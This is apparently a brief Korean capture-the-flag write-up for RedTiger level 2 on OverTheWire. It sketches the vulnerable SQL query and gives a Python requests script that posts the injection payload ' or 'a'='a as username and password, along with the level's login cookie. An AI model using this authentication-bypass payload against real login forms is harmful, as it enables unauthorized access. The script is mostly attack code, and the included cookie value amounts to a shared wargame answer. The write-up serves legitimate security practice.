[redtiger] level2¶
server -> DB 예측¶
- POST 파라미터: username, password
SELECT * FROM tb_name where
username='$_POST["username"]' AND
password='$_POST["password"]'
or¶
import requests
requests.packages.urllib3.disable_warnings()
url = "https://redtiger.labs.overthewire.org/level2.php"
cookies = {
"level2login":"easylevelsareeasy_%21"
}
payload = {
"username": "' or 'a'='a",
"password": "' or 'a'='a",
"login": "Login"
}
r = requests.post(url, cookies=cookies, data=payload, verify=False)
print r.content